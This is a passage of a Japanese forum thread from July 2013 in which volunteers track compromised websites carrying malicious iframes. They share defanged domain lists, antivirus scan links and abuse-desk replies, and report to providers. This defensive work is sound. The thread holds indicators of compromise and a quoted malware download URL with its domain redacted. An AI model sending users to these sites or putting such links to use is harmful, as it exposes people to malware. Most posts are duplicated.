206 :名無しさん@お腹いっぱい。:2013/07/04(木) NY:AN:NY.AN
・ω・
207 :/名無しさん[1-30] ◆.htmlint.U :2013/07/04(木) NY:AN:NY.AN
Last-Modified: Wed, 03 Jul 2013 13:41:32 GMT
81a338確認
81a338確認
208 :/名無しさん[1-30] ◆.htmlint.U :2013/07/04(木) NY:AN:NY.AN
209 :/名無しさん[1-30] ◆.htmlint.U :2013/07/05(金) NY:AN:NY.AN
210 :/名無しさん[1-30] ◆.htmlint.U :2013/07/05(金) NY:AN:NY.AN
ベターまたはベストに近いロータリー
国際ロータリー第2830地区 WEBサイト不正改ざんの概要及びサーバー復旧のご報告.pdf
https://docs.google.com/viewer?url=http%3A%2F%2Fwww%2Erotary%2Daomori%2Eorg%2F2012%2FPDF%2F20130609houkoku%2Epdf
http://www.google.co.jp/gwt/n?u=http%3A%2F%2Fwww%2Erotary%2Daomori%2Eorg%2F2012%2FPDF%2F20130609houkoku%2Epdf
不正アクセスによる各クラブの被害状況(詳細).pdf - 国際ロータリー第2830地区 「レンタルサーバー(rotary-aomori.org)への不正アクセスによるデータ改ざん等の被害状況」
https://docs.google.com/viewer?url=http%3A%2F%2Fwww%2Erotary%2Daomori%2Eorg%2F2012%2FPDF%2F20130609list%2Epdf
http://www.google.co.jp/gwt/n?u=http%3A%2F%2Fwww%2Erotary%2Daomori%2Eorg%2F2012%2FPDF%2F20130609list%2Epdf
サーバーの複数管理による改竄被害は不可避に近い状況なぬで、バッサリした判断・対応は賞賛に値すると漏れは思ふ。
国際ロータリー第2830地区 WEBサイト不正改ざんの概要及びサーバー復旧のご報告.pdf
https://docs.google.com/viewer?url=http%3A%2F%2Fwww%2Erotary%2Daomori%2Eorg%2F2012%2FPDF%2F20130609houkoku%2Epdf
http://www.google.co.jp/gwt/n?u=http%3A%2F%2Fwww%2Erotary%2Daomori%2Eorg%2F2012%2FPDF%2F20130609houkoku%2Epdf
不正アクセスによる各クラブの被害状況(詳細).pdf - 国際ロータリー第2830地区 「レンタルサーバー(rotary-aomori.org)への不正アクセスによるデータ改ざん等の被害状況」
https://docs.google.com/viewer?url=http%3A%2F%2Fwww%2Erotary%2Daomori%2Eorg%2F2012%2FPDF%2F20130609list%2Epdf
http://www.google.co.jp/gwt/n?u=http%3A%2F%2Fwww%2Erotary%2Daomori%2Eorg%2F2012%2FPDF%2F20130609list%2Epdf
サーバーの複数管理による改竄被害は不可避に近い状況なぬで、バッサリした判断・対応は賞賛に値すると漏れは思ふ。
211 :/名無しさん[1-30] ◆.htmlint.U :2013/07/05(金) NY:AN:NY.AN
212 :名無しさん@お腹いっぱい。:2013/07/07(日) NY:AN:NY.AN
www●gakysyuu●jp/hutyuu●html
ぐぐるが警告してるが私には分からないのでm(__)m
ぐぐるが警告してるが私には分からないのでm(__)m
213 :/名無しさん[1-30] ◆.htmlint.U :2013/07/10(水) NY:AN:NY.AN
(2013/07/10 9:40), JPCERT/CC wrote:
> --------- This is an automatic email from JPCERT/CC. ---------
>
> We would like to acknowledge the receipt of your incident report.
>
> Your incident report will be handled based on our policy. In certain
> situations, we may forward your report to the corresponding
> person/parties in a coordinated manner. Please promptly inform us if
> you do not wish to have your report forwarded.
>
> If you are not the appropriate person to receive this email, please
> disregard this message.
>
> Please feel free to contact us for further questions or comments.
>
> Best regards,
>>192
403
昨日、別件で#0c0896を確認
↑は検体送付の受理返信。一部詳細はさいとあどばいざに
http://megalodon.jp/2013-0709-2158-26/online.drweb.com/result/?url=http%3A%2F%2Frockbook01%2Eawe%2Ejp%2Fdekome%2Findex%2Ehtml
やったこと、ばりゅどめと親会社のGMOにつーほ
>>212
こちらの環境ではわからなかったん
くいんしーじょーんずぁゃゃにちかまつもんざぇもんでどぞー
はっぽーしゅうんめぇ
> --------- This is an automatic email from JPCERT/CC. ---------
>
> We would like to acknowledge the receipt of your incident report.
>
> Your incident report will be handled based on our policy. In certain
> situations, we may forward your report to the corresponding
> person/parties in a coordinated manner. Please promptly inform us if
> you do not wish to have your report forwarded.
>
> If you are not the appropriate person to receive this email, please
> disregard this message.
>
> Please feel free to contact us for further questions or comments.
>
> Best regards,
>>192
403
昨日、別件で#0c0896を確認
↑は検体送付の受理返信。一部詳細はさいとあどばいざに
http://megalodon.jp/2013-0709-2158-26/online.drweb.com/result/?url=http%3A%2F%2Frockbook01%2Eawe%2Ejp%2Fdekome%2Findex%2Ehtml
やったこと、ばりゅどめと親会社のGMOにつーほ
>>212
こちらの環境ではわからなかったん
くいんしーじょーんずぁゃゃにちかまつもんざぇもんでどぞー
はっぽーしゅうんめぇ
214 :名無しさん@お腹いっぱい。:2013/07/10(水) NY:AN:NY.AN
Web閲覧でのマルウェア検知が日本で急増、カスペルスキーが注意喚起
www.itmedia.co.jp/enterprise/articles/1307/05/news082.html
>7月1日以降は減少している
とりあえず収束かな
二ヶ月くらいはのんびり出来るかな
www.itmedia.co.jp/enterprise/articles/1307/05/news082.html
>7月1日以降は減少している
とりあえず収束かな
二ヶ月くらいはのんびり出来るかな
215 :名無しさん@お腹いっぱい。:2013/07/10(水) NY:AN:NY.AN
www1●ocn●ne●jp/~aoyamaco/
www1●ocn●ne●jp/~blitz/
www1●ocn●ne●jp/~satou●mc/
www1●ocn●ne●jp/~tei-teru/
www10●ocn●ne●jp/~kerotyan/
www10●ocn●ne●jp/~win-now/
www1●ocn●ne●jp/~blitz/
www1●ocn●ne●jp/~satou●mc/
www1●ocn●ne●jp/~tei-teru/
www10●ocn●ne●jp/~kerotyan/
www10●ocn●ne●jp/~win-now/
216 :名無しさん@お腹いっぱい。:2013/07/10(水) NY:AN:NY.AN
1ヶ月の第1週に改竄のピークが有り、100サイト位は毎日改竄されているような
状況なので、減ったなんて言えないのではないかな。
状況なので、減ったなんて言えないのではないかな。
217 :名無しさん@お腹いっぱい。:2013/07/10(水) NY:AN:NY.AN
www12●ocn●ne●jp/~act53/
www15●ocn●ne●jp/~asla/
www16●ocn●ne●jp/~kaigo-ok/
www2●ocn●ne●jp/~mi-yoshi/
www3●ocn●ne●jp/~kougetsu/
www3●ocn●ne●jp/~nml/
www15●ocn●ne●jp/~asla/
www16●ocn●ne●jp/~kaigo-ok/
www2●ocn●ne●jp/~mi-yoshi/
www3●ocn●ne●jp/~kougetsu/
www3●ocn●ne●jp/~nml/
218 :名無しさん@お腹いっぱい。:2013/07/10(水) NY:AN:NY.AN
>>216
ガ━━━━━━(゚д゚lll)━━━━━━ン
ガ━━━━━━(゚д゚lll)━━━━━━ン
219 :名無しさん@お腹いっぱい。:2013/07/10(水) NY:AN:NY.AN
www4●ocn●ne●jp/~a-6118/
www5●ocn●ne●jp/~camel/
www5●ocn●ne●jp/~kcoreyge/
www5●ocn●ne●jp/~zaitack/
www6●ocn●ne●jp/~kmkk/
www6●ocn●ne●jp/~onodensh/
www7●ocn●ne●jp/~ecoromy/
www8●ocn●ne●jp/~dutchrek/
www8●ocn●ne●jp/~ruah/
ds-sinjo●co●jp
www●raisu●co●jp
tt-ins●co●jp/
www5●ocn●ne●jp/~camel/
www5●ocn●ne●jp/~kcoreyge/
www5●ocn●ne●jp/~zaitack/
www6●ocn●ne●jp/~kmkk/
www6●ocn●ne●jp/~onodensh/
www7●ocn●ne●jp/~ecoromy/
www8●ocn●ne●jp/~dutchrek/
www8●ocn●ne●jp/~ruah/
ds-sinjo●co●jp
www●raisu●co●jp
tt-ins●co●jp/
220 :名無しさん@お腹いっぱい。:2013/07/10(水) NY:AN:NY.AN
221 :名無しさん@お腹いっぱい。:2013/07/11(木) NY:AN:NY.AN
222 :名無しさん@お腹いっぱい。:2013/07/12(金) NY:AN:NY.AN
>>221
ocnセキュリティから回答あり
ocnフォームでは受けられないもより
別経由でverio の窓口を聞き出しました
[email protected]
力尽きたので放置
ドコモ神奈川総務さん、がんばって
使用ブラウザがwindwsと言い張るドコモショップ新城店の相手は私には無理
ocnセキュリティから回答あり
ocnフォームでは受けられないもより
別経由でverio の窓口を聞き出しました
[email protected]
力尽きたので放置
ドコモ神奈川総務さん、がんばって
使用ブラウザがwindwsと言い張るドコモショップ新城店の相手は私には無理
223 :/名無しさん[1-30] ◆.htmlint.U :2013/07/13(土) NY:AN:NY.AN
224 :オルティス・ジャパン:2013/07/13(土) NY:AN:NY.AN
>>222
担当窓口はso-net法人向け窓口
当該ドメインはメールサーバーのもので作ったのはソネット、とDSは主張しています
昨日、DSサイドからソネットに問い合わせしたところ
改ざんはなく問題ないと回答したとのこと…
と、DSは主張しています
私がソネットに問い合わせしたところ、会員以外の問い合わせには応じられないと電話を切られました(笑
ウイルスに感染したとしても責任は取らないそうです
月曜以降に別の窓口に問い合わせする予定です
余談ですが、改ざんコードが
難読が解かれた不正な iframe に変更されてます
Kaspersky で検出できる様なのでDSにカスペルスキーを導入して貰うのも有りかと
担当窓口はso-net法人向け窓口
当該ドメインはメールサーバーのもので作ったのはソネット、とDSは主張しています
昨日、DSサイドからソネットに問い合わせしたところ
改ざんはなく問題ないと回答したとのこと…
と、DSは主張しています
私がソネットに問い合わせしたところ、会員以外の問い合わせには応じられないと電話を切られました(笑
ウイルスに感染したとしても責任は取らないそうです
月曜以降に別の窓口に問い合わせする予定です
余談ですが、改ざんコードが
難読が解かれた不正な iframe に変更されてます
Kaspersky で検出できる様なのでDSにカスペルスキーを導入して貰うのも有りかと
225 :名無しさん@お腹いっぱい。:2013/07/13(土) NY:AN:NY.AN
www12●ocn●ne●jp/~dz577-91/
www13●ocn●ne●jp/~smile-cd/
www3●ocn●ne●jp/~nml/
www3●ocn●ne●jp/~skk-west/
www13●ocn●ne●jp/~smile-cd/
www3●ocn●ne●jp/~nml/
www3●ocn●ne●jp/~skk-west/
226 :名無しさん@お腹いっぱい。:2013/07/13(土) NY:AN:NY.AN
227 :/名無しさん[1-30] ◆.htmlint.U :2013/07/13(土) NY:AN:NY.AN
>>223 (2013/07/13 0:15),
> Greetings from the NTT Communications Global IP Network Security Team,
>
> This is an automated reply to inform you that we have received your e-mail
> regarding an alleged violation of our Acceptable Use Policy by a customer
> of NTT Communications.
>
> If your issue involves unsolicited commercial e-mail, please reply to us
> with the entire unsolicited e-mail with complete headers if you have not
> already done so. Please limit your e-mail to essential information that
> would help us with investigating the incident. Personal commentary may
> delay the processing of your request.
>
> Please be advised that we can only address abuse issues regarding NTT
> Communications customers. Spam and/or abuse issues involving non-NTT
> Communications customers need to be reported to the Abuse address of the
> originating domain or service provider for proper handling and disposition.
> Please be aware that it is common for spam and Usenet abuse to be generated
> with false or manipulated return addresses, thus the issue may not involve
> NTT Communications or its customers. Please look at the full header
> information, including the received lines, to determine the true origin of
> the e-mail. For Usenet, you can use the 'NNTP posting host' IP address or
> hostname.
>
> We appreciate the time you have taken to report the alleged abuse, however
> due to the volume of e-mails we receive, we are not able to respond
> personally to each complaint received.
[省略]
ntt.netのabuseからは自動返信きてた
>>225-226
お疲れ様です。
> Greetings from the NTT Communications Global IP Network Security Team,
>
> This is an automated reply to inform you that we have received your e-mail
> regarding an alleged violation of our Acceptable Use Policy by a customer
> of NTT Communications.
>
> If your issue involves unsolicited commercial e-mail, please reply to us
> with the entire unsolicited e-mail with complete headers if you have not
> already done so. Please limit your e-mail to essential information that
> would help us with investigating the incident. Personal commentary may
> delay the processing of your request.
>
> Please be advised that we can only address abuse issues regarding NTT
> Communications customers. Spam and/or abuse issues involving non-NTT
> Communications customers need to be reported to the Abuse address of the
> originating domain or service provider for proper handling and disposition.
> Please be aware that it is common for spam and Usenet abuse to be generated
> with false or manipulated return addresses, thus the issue may not involve
> NTT Communications or its customers. Please look at the full header
> information, including the received lines, to determine the true origin of
> the e-mail. For Usenet, you can use the 'NNTP posting host' IP address or
> hostname.
>
> We appreciate the time you have taken to report the alleged abuse, however
> due to the volume of e-mails we receive, we are not able to respond
> personally to each complaint received.
[省略]
ntt.netのabuseからは自動返信きてた
>>225-226
お疲れ様です。
228 :/名無しさん[1-30] ◆.htmlint.U :2013/07/13(土) NY:AN:NY.AN
memo>>223
http://megalodon.jp/2013-0713-1602-32/online.drweb.com/result/?url=http%3A%2F%2Fds%2Dsinjo%2Eco%2Ejp%2F
http://megalodon.jp/2013-0713-1603-34/online.drweb.com/result/?url=http%3A%2F%2Fds%2Dsinjo%2Eco%2Ejp%2Findex%2Ehtml
http://megalodon.jp/2013-0713-1604-21/online.drweb.com/result/?url=http%3A%2F%2F204%2E227%2E180%2E5%2F
http://megalodon.jp/2013-0713-1605-06/online.drweb.com/result/?url=http%3A%2F%2F204%2E227%2E180%2E5%2Findex%2Ehtml
> infected with JS.IFrame.425
http://megalodon.jp/2013-0713-1325-49/https://www.virustotal.com:443/en/ip-address/204.227.180.5/information/
http://megalodon.jp/2013-0713-1622-32/https://www.virustotal.com:443/en/domain/ds-sinjo.co.jp/information/
https://www.virustotal.com/en/url/f6d10cdb3b54a5c49da2ee9fc446063561abb2924ddf7c0f9d4be75d656e514e/analysis/1373688884/
https://www.virustotal.com/en/url/4c905e198445135d490073ebeea523832e38aedc52631c1a6c9b011a11a9a4a8/analysis/1373688760/
https://www.virustotal.com/en/url/20411b453b7e8687afb5252dbc7b38d60345558518fb2c1cf95c6149b4571578/analysis/1373691510/
https://www.virustotal.com/en/url/e7843e3e8c2b49a935feffa309b442fc972a9265dda47d8ad6aa85c83bc167a8/analysis/1373691510/
https://www.virustotal.com/en/file/c70b6b722553beb6156aa57c9a58169fc2ebb4bc18f1b4c8c70732399a9885a9/analysis/1373689116/
http://megalodon.jp/2013-0713-1602-32/online.drweb.com/result/?url=http%3A%2F%2Fds%2Dsinjo%2Eco%2Ejp%2F
http://megalodon.jp/2013-0713-1603-34/online.drweb.com/result/?url=http%3A%2F%2Fds%2Dsinjo%2Eco%2Ejp%2Findex%2Ehtml
http://megalodon.jp/2013-0713-1604-21/online.drweb.com/result/?url=http%3A%2F%2F204%2E227%2E180%2E5%2F
http://megalodon.jp/2013-0713-1605-06/online.drweb.com/result/?url=http%3A%2F%2F204%2E227%2E180%2E5%2Findex%2Ehtml
> infected with JS.IFrame.425
http://megalodon.jp/2013-0713-1325-49/https://www.virustotal.com:443/en/ip-address/204.227.180.5/information/
http://megalodon.jp/2013-0713-1622-32/https://www.virustotal.com:443/en/domain/ds-sinjo.co.jp/information/
https://www.virustotal.com/en/url/f6d10cdb3b54a5c49da2ee9fc446063561abb2924ddf7c0f9d4be75d656e514e/analysis/1373688884/
https://www.virustotal.com/en/url/4c905e198445135d490073ebeea523832e38aedc52631c1a6c9b011a11a9a4a8/analysis/1373688760/
https://www.virustotal.com/en/url/20411b453b7e8687afb5252dbc7b38d60345558518fb2c1cf95c6149b4571578/analysis/1373691510/
https://www.virustotal.com/en/url/e7843e3e8c2b49a935feffa309b442fc972a9265dda47d8ad6aa85c83bc167a8/analysis/1373691510/
https://www.virustotal.com/en/file/c70b6b722553beb6156aa57c9a58169fc2ebb4bc18f1b4c8c70732399a9885a9/analysis/1373689116/
229 :名無しさん@お腹いっぱい。:2013/07/13(土) NY:AN:NY.AN
sinei-kitchen●com/
kyoei-medical-o2●co●jp
fruits-lunch●com/
aomoriya●jp/basic●js
www12●big●or●jp/~zero-one/
www2●big●or●jp/~zero-one/
www22●big●or●jp/~zero-one/
kyoei-medical-o2●co●jp
fruits-lunch●com/
aomoriya●jp/basic●js
www12●big●or●jp/~zero-one/
www2●big●or●jp/~zero-one/
www22●big●or●jp/~zero-one/
230 :名無しさん@お腹いっぱい。:2013/07/13(土) NY:AN:NY.AN
>>229
@AB
FirstServer正規フロー窓口↓
supportorder.fsv.jp/form/toiawase_input.aspx ← フォームから対応されるかtest
フォーム発射完了
CDEF
月曜以降に正規フローを確認した後に(お盆なので時間が掛かるかも)
@AB
FirstServer正規フロー窓口↓
supportorder.fsv.jp/form/toiawase_input.aspx ← フォームから対応されるかtest
フォーム発射完了
CDEF
月曜以降に正規フローを確認した後に(お盆なので時間が掛かるかも)
231 :名無しさん@お腹いっぱい。:2013/07/13(土) NY:AN:NY.AN
>>203,214
追加
www.npa.go.jp/cyberpolice/detect/pdf/20130626.pdf
winXPは更新しても脆弱性は解消されない方向にあるんじゃなかろうかと思われるのですが
警察庁は低能集団ですかw
追加
www.npa.go.jp/cyberpolice/detect/pdf/20130626.pdf
winXPは更新しても脆弱性は解消されない方向にあるんじゃなかろうかと思われるのですが
警察庁は低能集団ですかw
232 :名無しさん@お腹いっぱい。:2013/07/14(日) NY:AN:NY.AN
>>231
OSかえろってのは経済的な問題も出てくるので残念ながら非現実的
ユーザーが自力で持続可能な範囲で基本的な対応を促すしかないんじゃないかと
知り合いに対してでもいきなりPC変えろとは言い難いし
OSかえろってのは経済的な問題も出てくるので残念ながら非現実的
ユーザーが自力で持続可能な範囲で基本的な対応を促すしかないんじゃないかと
知り合いに対してでもいきなりPC変えろとは言い難いし
233 :名無しさん@お腹いっぱい。:2013/07/14(日) NY:AN:NY.AN
>>232
・個人が趣味でホームページをもっている場合、趣味であるならお金は惜しまないはず
・企業である場合、企業なら金は惜しむべきではないでしょう
新しいOSの乗ったPC5万有れば買えます
分割でもいいでしょう
ホームページを持たずに趣味でPCを使っているだけならいざしらず
不特定多数が閲覧するホームページを所有するなら必要不可欠な出費であると覚悟するべきでしょ
・個人が趣味でホームページをもっている場合、趣味であるならお金は惜しまないはず
・企業である場合、企業なら金は惜しむべきではないでしょう
新しいOSの乗ったPC5万有れば買えます
分割でもいいでしょう
ホームページを持たずに趣味でPCを使っているだけならいざしらず
不特定多数が閲覧するホームページを所有するなら必要不可欠な出費であると覚悟するべきでしょ
234 :名無しさん@お腹いっぱい。:2013/07/14(日) NY:AN:NY.AN
235 :名無しさん@お腹いっぱい。:2013/07/14(日) NY:AN:NY.AN
>>234
web改ざんされないための注意喚起でもあります
web改ざんされないための注意喚起でもあります
236 :名無しさん@お腹いっぱい。:2013/07/14(日) NY:AN:NY.AN
サイト所有者が>>231を真に受け「最新の状態に更新してるからおkじゃん」と錯誤させることが問題なのです
237 :名無しさん@お腹いっぱい。:2013/07/14(日) NY:AN:NY.AN
n-sagami●com/ryoko/ryoko1●html
sanyogiken-gp●co●jp/
nature-nail●com/
m-filled●com/
sanyogiken-gp●co●jp/
nature-nail●com/
m-filled●com/
238 :名無しさん@お腹いっぱい。:2013/07/14(日) NY:AN:NY.AN
>>237
ocnフォーム発射完了
ocnフォーム発射完了
239 :名無しさん@お腹いっぱい。:2013/07/14(日) NY:AN:NY.AN
ここも全く対応しない
aiweb●or●jp/nagoya-handbag/
aiweb●or●jp/nagoya-handbag/
240 :名無しさん@お腹いっぱい。:2013/07/14(日) NY:AN:NY.AN
インターネット三重 プロバイダが感染!
三重に感染が多いのはこういうところが感染しているからなのでしょう
inetmie.or.jp/
三重に感染が多いのはこういうところが感染しているからなのでしょう
inetmie.or.jp/
241 :名無しさん@お腹いっぱい。:2013/07/14(日) NY:AN:NY.AN
242 :/名無しさん[1-30] ◆.htmlint.U :2013/07/14(日) NY:AN:NY.AN
お疲れ様です。
240 Lynxでフォームからつーほーしてみました。
文字入力数の限界ぽかった
saitoadobaizanimokisaisuta
240 Lynxでフォームからつーほーしてみました。
文字入力数の限界ぽかった
saitoadobaizanimokisaisuta
243 :名無しさん@お腹いっぱい。:2013/07/15(月) NY:AN:NY.AN
atene●co●jp/
eishin-maoyi●co●jp/
esn●co●jp/
eishin-maoyi●co●jp/
esn●co●jp/
244 :/名無しさん[1-30] ◆.htmlint.U :2013/07/15(月) NY:AN:NY.AN
Redkit により Web で赤信号が点灯 | Symantec Connect コミュニティ
http://www.symantec.com/connect/ja/blogs/redkit-web
http://www.symantec.com/connect/ja/blogs/redkit-web
245 :/名無しさん[1-30] ◆.htmlint.U :2013/07/15(月) NY:AN:NY.AN
>>243
お疲れ様です
上下 https://cgi01.ocn.ne.jp/support/abuse/blog.html
中 viaVerio Customer Service >222 [email protected]
つーほーすますた
saitoadobaizanobaguyaro
検体どーすべ
お疲れ様です
上下 https://cgi01.ocn.ne.jp/support/abuse/blog.html
中 viaVerio Customer Service >222 [email protected]
つーほーすますた
saitoadobaizanobaguyaro
検体どーすべ
246 :名無しさん@お腹いっぱい。:2013/07/15(月) NY:AN:NY.AN
247 :/名無しさん[1-30] ◆.htmlint.U :2013/07/15(月) NY:AN:NY.AN
詳細とかさっぱりなんですが、ぐぐるとこんなのが
BKDR_BIFROSE.FUU | 危険度: 低 | トレンドマイクロ:セキュリティ情報
http://about-threats.trendmicro.com/Malware.aspx?id=47811&name=BKDR_BIFROSE.FUU&language=jp
> ダウンロード活動
> マルウェアは、以下のWebサイトにアクセスし、不正なファイルをダウンロードして実行します。
> ・ http://{BLOCKED}secure.net/ABIUSP/setup.exe
サブドメインだったのかな?
BKDR_BIFROSE.FUU | 危険度: 低 | トレンドマイクロ:セキュリティ情報
http://about-threats.trendmicro.com/Malware.aspx?id=47811&name=BKDR_BIFROSE.FUU&language=jp
> ダウンロード活動
> マルウェアは、以下のWebサイトにアクセスし、不正なファイルをダウンロードして実行します。
> ・ http://{BLOCKED}secure.net/ABIUSP/setup.exe
サブドメインだったのかな?
248 :/名無しさん[1-30] ◆.htmlint.U :2013/07/15(月) NY:AN:NY.AN
>>242
進捗状況
http://megalodon.jp/2013-0714-2246-24/https://www.virustotal.com:443/en/ip-address/61.114.231.60/information/
http://megalodon.jp/2013-0715-0145-15/https://www.virustotal.com:443/en/ip-address/61.114.231.60/information/
http://megalodon.jp/2013-0715-0941-35/https://www.virustotal.com:443/en/ip-address/61.114.231.60/information/
http://megalodon.jp/2013-0715-1607-48/https://www.virustotal.com:443/en/ip-address/61.114.231.60/information/
http://megalodon.jp/2013-0715-2241-04/https://www.virustotal.com:443/en/ip-address/61.114.231.60/information/
進捗状況
http://megalodon.jp/2013-0714-2246-24/https://www.virustotal.com:443/en/ip-address/61.114.231.60/information/
http://megalodon.jp/2013-0715-0145-15/https://www.virustotal.com:443/en/ip-address/61.114.231.60/information/
http://megalodon.jp/2013-0715-0941-35/https://www.virustotal.com:443/en/ip-address/61.114.231.60/information/
http://megalodon.jp/2013-0715-1607-48/https://www.virustotal.com:443/en/ip-address/61.114.231.60/information/
http://megalodon.jp/2013-0715-2241-04/https://www.virustotal.com:443/en/ip-address/61.114.231.60/information/
249 :/名無しさん[1-30] ◆.htmlint.U :2013/07/16(火) NY:AN:NY.AN
>>242
完了
完了
250 :名無しさん@お腹いっぱい。:2013/07/16(火) NY:AN:NY.AN
大阪府文化財センターのページやられてるのにまだ改善なしか?
251 :/名無しさん[1-30] ◆.htmlint.U :2013/07/16(火) NY:AN:NY.AN
>>250
大阪府文化財センターの公式サイトにバイ@グラの隠し宣伝リンクがっ! - 無題な濃いログ - Yahoo!ジオシティーズ
http://geocities.yahoo.co.jp/gl/gbmogiki/view/20130715/1373872947
0day.jp (ゼロデイ.JP): #OCJP-109:RedKit転送仕組みにやられた国内のサイト
http://unixfreaxjp.blogspot.jp/2013/07/ocjp-109redkit.html
こんなの
http://wepawet.cs.ucsb.edu/view.php?hash=ea87827ea1f4ace820cb839bd0d20cb7&t=1373783744&type=js
http://wepawet.cs.ucsb.edu/view.php?hash=45b6a121d0f67e3503e07dbe12dfdbe8&t=1373785897&type=js
http://kohada.2ch.net/test/read.cgi/sec/1369932406/177
ウィルス撒布者[occh-i]に告ぐ
http://homepage2.nifty.com/HAYAKASA/tawake.html
南河内考古学研究所 情報掲示板 -考古学関連の情報・博物館展示情報・図書刊行情報など-
http://www.skao.net/arcbbs/minibbs.cgi?ff=38887&cmd=rm
pc1.occh-unet.ocn.ne.jp (当時)
絶句
情報セキュリティ・個人情報保護 ブログ: パソコンソフトの違法コピーは絶対ダメ!
http://www.azport.jp/weblog/2009/03/post_180.html
大阪府文化財センターの公式サイトにバイ@グラの隠し宣伝リンクがっ! - 無題な濃いログ - Yahoo!ジオシティーズ
http://geocities.yahoo.co.jp/gl/gbmogiki/view/20130715/1373872947
0day.jp (ゼロデイ.JP): #OCJP-109:RedKit転送仕組みにやられた国内のサイト
http://unixfreaxjp.blogspot.jp/2013/07/ocjp-109redkit.html
こんなの
http://wepawet.cs.ucsb.edu/view.php?hash=ea87827ea1f4ace820cb839bd0d20cb7&t=1373783744&type=js
http://wepawet.cs.ucsb.edu/view.php?hash=45b6a121d0f67e3503e07dbe12dfdbe8&t=1373785897&type=js
http://kohada.2ch.net/test/read.cgi/sec/1369932406/177
ウィルス撒布者[occh-i]に告ぐ
http://homepage2.nifty.com/HAYAKASA/tawake.html
南河内考古学研究所 情報掲示板 -考古学関連の情報・博物館展示情報・図書刊行情報など-
http://www.skao.net/arcbbs/minibbs.cgi?ff=38887&cmd=rm
pc1.occh-unet.ocn.ne.jp (当時)
絶句
情報セキュリティ・個人情報保護 ブログ: パソコンソフトの違法コピーは絶対ダメ!
http://www.azport.jp/weblog/2009/03/post_180.html
252 :/名無しさん[1-30] ◆.htmlint.U :2013/07/16(火) NY:AN:NY.AN
>>251
http://namidame.2ch.net/test/read.cgi/news/1208918626/
http://academy6.2ch.net/test/read.cgi/archeology/1234569515/
http://namidame.2ch.net/test/read.cgi/news/1208918626/
http://academy6.2ch.net/test/read.cgi/archeology/1234569515/
253 :名無しさん@お腹いっぱい。:2013/07/16(火) NY:AN:NY.AN
254 :名無しさん@お腹いっぱい。:2013/07/16(火) NY:AN:NY.AN
255 :名無しさん@お腹いっぱい。:2013/07/16(火) NY:AN:NY.AN
256 :名無しさん@お腹いっぱい。:2013/07/17(水) NY:AN:NY.AN
257 :名無しさん@お腹いっぱい。:2013/07/17(水) NY:AN:NY.AN
258 :/名無しさん[1-30] ◆.htmlint.U :2013/07/18(木) NY:AN:NY.AN
txtどこー?
IPA 独立行政法人 情報処理推進機構:2013年7月の呼びかけ
Last-Modified: Mon, 08 Jul 2013 09:53:17 GMT : http://www.ipa.go.jp/security/txt/2013/07outline.html
> 更新履歴
> 2013年 7月 8日 「(2)改ざん有無の確認方法」を「(2)ウェブ改ざんへの対策」へ修正
> 「(3)ウェブ改ざんの被害発生時の対処」内のセキュリティ関連の組織や企業が提供している、無料でウイルスチェックができるウェブサイトへのリンクを修正
> 2013年 7月 5日 「(3)ウェブ改ざんの被害発生時の対処」内のセキュリティ関連の組織や企業が提供している、無料でウイルスチェックができるウェブサイトへのリンクを修正
> 2013年 7月 1日 掲載
IPA 独立行政法人 情報処理推進機構:2013年7月の呼びかけ
Last-Modified: Mon, 08 Jul 2013 09:53:17 GMT : http://www.ipa.go.jp/security/txt/2013/07outline.html
> 更新履歴
> 2013年 7月 8日 「(2)改ざん有無の確認方法」を「(2)ウェブ改ざんへの対策」へ修正
> 「(3)ウェブ改ざんの被害発生時の対処」内のセキュリティ関連の組織や企業が提供している、無料でウイルスチェックができるウェブサイトへのリンクを修正
> 2013年 7月 5日 「(3)ウェブ改ざんの被害発生時の対処」内のセキュリティ関連の組織や企業が提供している、無料でウイルスチェックができるウェブサイトへのリンクを修正
> 2013年 7月 1日 掲載
259 :名無しさん@お腹いっぱい。:2013/07/18(木) NY:AN:NY.AN
>>229の4
レンタル元より返信
サイト管理者への連絡および該当サイトを停止
401になってるね
レンタル元さんの問い合わせフォームから連絡し対応してもらいました
http://www.future-s.com/contact/index.html
レンタル元より返信
サイト管理者への連絡および該当サイトを停止
401になってるね
レンタル元さんの問い合わせフォームから連絡し対応してもらいました
http://www.future-s.com/contact/index.html
260 :名無しさん@お腹いっぱい。:2013/07/18(木) NY:AN:NY.AN
>>259
乙ですー
乙ですー
261 :名無しさん@お腹いっぱい。:2013/07/19(金) NY:AN:NY.AN
262 :名無しさん@お腹いっぱい。:2013/07/19(金) NY:AN:NY.AN
大阪府文化財センターに凸して聞いてみました
委託業者は、サン・ネットワークスとのこと
サン・ネットワークスが具体的にどこなのかは分かりませんがw
www.siteadvisor.com/sites/http%3A//www.sunnetworks.jp/
イエロー判定カワウソw
委託業者は、サン・ネットワークスとのこと
サン・ネットワークスが具体的にどこなのかは分かりませんがw
www.siteadvisor.com/sites/http%3A//www.sunnetworks.jp/
イエロー判定カワウソw
263 :サックー ◆2kgWDl81kI :2013/07/19(金) NY:AN:NY.AN
AVG2013インターネットセキュリティ使ってますが踏む勇気が出ない・・・・
264 :名無しさん@お腹いっぱい。:2013/07/19(金) NY:AN:NY.AN
【LINE】「NAVERまとめ」などに不正アクセス、169万件のID流出ニダ━━━<丶`∀´>━━━━!!!!
hayabusa3.2ch.net/test/read.cgi/news/1374231868/
【緊急】LINEで有名なNAVERの個人情報流出 アカウント名・パスワードなどが漏れる
engawa.2ch.net/test/read.cgi/poverty/1374227937/
ネバよ!お前もか!注意せネバネバ
hayabusa3.2ch.net/test/read.cgi/news/1374231868/
【緊急】LINEで有名なNAVERの個人情報流出 アカウント名・パスワードなどが漏れる
engawa.2ch.net/test/read.cgi/poverty/1374227937/
ネバよ!お前もか!注意せネバネバ
265 :名無しさん@お腹いっぱい。:2013/07/19(金) NY:AN:NY.AN
nature-nail●com/
ohuk●jp/
tb9●jp/js/jquery●fademover●js
www●esn●co●jp/
www●kk-nishimaki●co●jp/newshop/event/springfare●html
www7●ocn●ne●jp/~gbusters
ohuk●jp/
tb9●jp/js/jquery●fademover●js
www●esn●co●jp/
www●kk-nishimaki●co●jp/newshop/event/springfare●html
www7●ocn●ne●jp/~gbusters
266 :名無しさん@お腹いっぱい。:2013/07/19(金) NY:AN:NY.AN
267 :/名無しさん[1-30] ◆.htmlint.U :2013/07/19(金) NY:AN:NY.AN
268 :/名無しさん[1-30] ◆.htmlint.U :2013/07/20(土) NY:AN:NY.AN
げはしくねもい
よくよく検索し直したら18金げむのさいとの跡地のようだたー@さいとあどばいざ
よくよく検索し直したら18金げむのさいとの跡地のようだたー@さいとあどばいざ
269 :オルティス・ジャパン:2013/07/20(土) NY:AN:NY.AN
